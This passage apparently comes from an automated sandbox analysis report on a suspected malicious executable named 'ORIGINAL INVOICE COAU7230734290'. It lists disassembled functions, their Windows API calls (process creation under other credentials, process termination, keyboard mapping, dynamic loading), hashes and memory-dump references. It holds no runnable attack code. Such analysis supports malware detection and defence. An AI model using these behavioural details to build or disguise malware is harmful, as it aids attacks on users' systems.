                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0022AFFE
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 0022B012
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: d4ad462df47961e18ce4b9a96488464c0e95852d6a3b0a64cfc26b157060af13
                                                              • Instruction ID: 2a882837a9b117dd2df90b8a9ea50319d7c0feb780ade51c472b3a41692303a9
                                                              • Opcode Fuzzy Hash: d4ad462df47961e18ce4b9a96488464c0e95852d6a3b0a64cfc26b157060af13
                                                              • Instruction Fuzzy Hash: 1E21797251021ABFDB128FE4EE09FEE7BA9BF44304F044015FA05A2561D37A9D60EB61
                                                              Function 0025EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0020AFE3
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020AFF2
                                                                • Part of subcall function 0020AF83: BeginPath.GDI32(?), ref: 0020B009
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020B033
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0025EC20
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0025EC34
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0025EC42
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0025EC52
                                                              • EndPath.GDI32(00000000), ref: 0025EC62
                                                              • StrokePath.GDI32(00000000), ref: 0025EC72
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: 0f10a1aa17239a29f269945ab8a4cf11141b06a0423cd38e96751df2e5d45dda
                                                              • Instruction ID: e1f4a8f3c5d13b6954e0f765f6a73493f69618f012afc165f3e34db3cc6381b6
                                                              • Opcode Fuzzy Hash: 0f10a1aa17239a29f269945ab8a4cf11141b06a0423cd38e96751df2e5d45dda
                                                              • Instruction Fuzzy Hash: 60110972000149BFEF029FA0EC88EEA7F6DEF08351F048112BE0889160D7719EA5DBA0
                                                              Function 0022E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0022E1C0
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0022E1D1
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0022E1D8
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0022E1E0
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0022E1F7
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0022E209
                                                                • Part of subcall function 00229AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00229A05,00000000,00000000,?,00229DDB), ref: 0022A53A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                              • String ID:
                                                              • API String ID: 603618608-0
                                                              • Opcode ID: baab1f2f48ea4935a9bc91201e5204971aaddefd1f51e8bd710c58684c977cf9
                                                              • Instruction ID: 4f77bfff158c8faed5f2410e9a3c81d02f2eae6a53144408a62a4225ed78dca9
                                                              • Opcode Fuzzy Hash: baab1f2f48ea4935a9bc91201e5204971aaddefd1f51e8bd710c58684c977cf9
                                                              • Instruction Fuzzy Hash: F70121B5A40615BBEB109FA6AC49A5ABFB9EF48751F004066EA08A7290D6719C11CBA0
                                                              Function 00217B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00217B47
                                                                • Part of subcall function 0021123A: __initp_misc_winsig.LIBCMT ref: 0021125E
                                                                • Part of subcall function 0021123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00217F51
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00217F65
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00217F78
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00217F8B
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00217F9E
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00217FB1
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00217FC4
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00217FD7
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00217FEA
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00217FFD
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00218010
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00218023
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00218036
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00218049
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0021805C
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0021806F
                                                              • __mtinitlocks.LIBCMT ref: 00217B4C
                                                                • Part of subcall function 00217E23: InitializeCriticalSectionAndSpinCount.KERNEL32(002AAC68,00000FA0,?,?,00217B51,00215E77,002A6C70,00000014), ref: 00217E41
                                                              • __mtterm.LIBCMT ref: 00217B55
                                                                • Part of subcall function 00217BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00217B5A,00215E77,002A6C70,00000014), ref: 00217D3F
                                                                • Part of subcall function 00217BBD: _free.LIBCMT ref: 00217D46
                                                                • Part of subcall function 00217BBD: DeleteCriticalSection.KERNEL32(002AAC68,?,?,00217B5A,00215E77,002A6C70,00000014), ref: 00217D68
                                                              • __calloc_crt.LIBCMT ref: 00217B7A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00217BA3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 2942034483-0
                                                              • Opcode ID: b9a35589211cdc7fb02688ae8ac22f4205ff06caa17202df2e318ba54ba7feba
                                                              • Instruction ID: acd6e94a6019b7da70b31d3f62ca08b29a9046db110869f1e92f36f65fe81b45
                                                              • Opcode Fuzzy Hash: b9a35589211cdc7fb02688ae8ac22f4205ff06caa17202df2e318ba54ba7feba
                                                              • Instruction Fuzzy Hash: 31F09C3153D3121AE6357B347C066CB26F49FA2734F204695F954C60D1FF2549F14961
                                                              Function 001F27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001F281D
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001F2825
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001F2830
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001F283B
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001F2843
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001F284B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 9f34252f5bb10f79b773a8a50e2862da4d6c276f382549c7203983121c9d5b5d
                                                              • Instruction ID: 82554e29038046329f1c155fcf853adf80857f821fad69ec5b229989961c79fd
                                                              • Opcode Fuzzy Hash: 9f34252f5bb10f79b773a8a50e2862da4d6c276f382549c7203983121c9d5b5d
                                                              • Instruction Fuzzy Hash: 8A0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A864CBE5
                                                              Function 00239AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 1423608774-0
                                                              • Opcode ID: 78577ba3dcf22818ab6a9a82f8860c0a16ba8df8645c8ea9e6569424e8deb69b
                                                              • Instruction ID: 3a48d86906fa4e3d3fa47c7377a3037cf90df2f75038d9ca51ac8c6bbabee58f
                                                              • Opcode Fuzzy Hash: 78577ba3dcf22818ab6a9a82f8860c0a16ba8df8645c8ea9e6569424e8deb69b
                                                              • Instruction Fuzzy Hash: EF01F472112222ABD7141F98FC5CDEB7779FF89701F04016AF907A20A2DBB4AC91DB60
                                                              Function 00237BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00237C07
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00237C1D
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00237C2C
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00237C3B
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00237C45
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00237C4C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 01761d81e1c8e9b98930795633a5a1befe48b9c722394dd451185cdfcc1c1dbf
                                                              • Instruction ID: 165b74ccaf268866a3284767c252e63013ce096d700cf0bc5a438e8e0a17fb7f
                                                              • Opcode Fuzzy Hash: 01761d81e1c8e9b98930795633a5a1befe48b9c722394dd451185cdfcc1c1dbf
                                                              • Instruction Fuzzy Hash: A1F03A72241159BBE7215B52BC0EEEF7B7CEFC6B11F000069FA0991051D7A05A81C6B5
                                                              Function 00239A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00239A33
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A44
                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A51
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A5E
                                                                • Part of subcall function 002393D1: CloseHandle.KERNEL32(?,?,00239A6B,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 002393DB
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00239A71
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A78
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: ffb119f58cf7acdd71f16b7dc13fb3301ac56288d56e80e88129a716962834a8
                                                              • Instruction ID: 5996535255b2178d6ef5a53bb228cfa426ebaeea6eefd39b80741bbeedb9e683
                                                              • Opcode Fuzzy Hash: ffb119f58cf7acdd71f16b7dc13fb3301ac56288d56e80e88129a716962834a8
                                                              • Instruction Fuzzy Hash: 2BF0E272141212ABD3111FA4FC8CDEB3739FF85301F040061F907A10B2DBB59892DB60
                                                              Function 001F1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020F4EA: std::exception::exception.LIBCMT ref: 0020F51E
                                                                • Part of subcall function 0020F4EA: __CxxThrowException@8.LIBCMT ref: 0020F533
                                                              • __swprintf.LIBCMT ref: 001F1EA6
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001F1D49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 2125237772-557222456
                                                              • Opcode ID: 36f0089ac1fa5d6cd20ac4a7dc80839ab29dfbea705f94be227f05e23cf419db
                                                              • Instruction ID: 45497593739346105c09885f7b719053cc60ab7edffda669c0ae70a17caab7e3
                                                              • Opcode Fuzzy Hash: 36f0089ac1fa5d6cd20ac4a7dc80839ab29dfbea705f94be227f05e23cf419db
                                                              • Instruction Fuzzy Hash: B8917B72118209EFC724FF24C895C7AB7A4BFA5700F14491DFA86972A2DB70ED54CB92
                                                              Function 0024AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0024B006
                                                              • CharUpperBuffW.USER32(?,?), ref: 0024B115
                                                              • VariantClear.OLEAUT32(?), ref: 0024B298
                                                                • Part of subcall function 00239DC5: VariantInit.OLEAUT32(00000000), ref: 00239E05
                                                                • Part of subcall function 00239DC5: VariantCopy.OLEAUT32(?,?), ref: 00239E0E
                                                                • Part of subcall function 00239DC5: VariantClear.OLEAUT32(?), ref: 00239E1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 1a2998bef13435f376955c6aacfb1e5dd0d3703e00c2ea027ec7ad944141bc6d
                                                              • Instruction ID: 890ea27d98ed1e80d0fac0f06d40fbb6df2673a8f705529942f013941b1c99d3
                                                              • Opcode Fuzzy Hash: 1a2998bef13435f376955c6aacfb1e5dd0d3703e00c2ea027ec7ad944141bc6d
                                                              • Instruction Fuzzy Hash: 52919B746183069FCB14DF24C58196BB7F4BF89700F04482DF98A8B3A2DB71E915CB92
                                                              Function 00235347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020C6F4: _wcscpy.LIBCMT ref: 0020C717
                                                              • _memset.LIBCMT ref: 00235438
                                                              • GetMenuItemInfoW.USER32(?), ref: 00235467
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00235513
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0023553D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: d43b8baf0b85787b36fe08ba101a1ff0d31c2311eb200c51ffc7965a6f89ae79
                                                              • Instruction ID: 26757d9a5a07c1790de9cb4d779c2f96c22dd02f3c09cfb8a8bac94f44193e63
                                                              • Opcode Fuzzy Hash: d43b8baf0b85787b36fe08ba101a1ff0d31c2311eb200c51ffc7965a6f89ae79
                                                              • Instruction Fuzzy Hash: 9B5136F12347229BD3149F28C8446BBB7E8EF95350F940A2DF99ED3191DBA0DD608B52
                                                              Function 00230213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0023027B
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002302B1
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002302C2
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00230344
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: aeb99e0c324a4a24f737b8065660cc9a82121e25d84af81b75f3eaffd01b5a12
                                                              • Instruction ID: 14071bcfebb16a6be7b0e2e21ff76692d69244df969f0f7f01447467f989259d
                                                              • Opcode Fuzzy Hash: aeb99e0c324a4a24f737b8065660cc9a82121e25d84af81b75f3eaffd01b5a12
                                                              • Instruction Fuzzy Hash: 29415AB1620205EFDB05CF54C8E4B9A7BB9EF45310F1480A9AA09DF206D7B1DE54CBB1
                                                              Function 00235007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00235075
                                                              • GetMenuItemInfoW.USER32 ref: 00235091
                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 002350D7
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002B1708,00000000), ref: 00235120
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 9540668d868702247c2089b1a09ae45fc3f7d602263d1c8573073deeff3cdb12
                                                              • Instruction ID: 88def3fd958528fe761d345f4a65e4234511491ce36a1e7519d4162a050f03b3
                                                              • Opcode Fuzzy Hash: 9540668d868702247c2089b1a09ae45fc3f7d602263d1c8573073deeff3cdb12
                                                              • Instruction Fuzzy Hash: 444113B12147129FD720DF24EC84B2AB7E8AF89324F044A5EF89D97281D730E910CB62
                                                              Function 0023E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0023E742
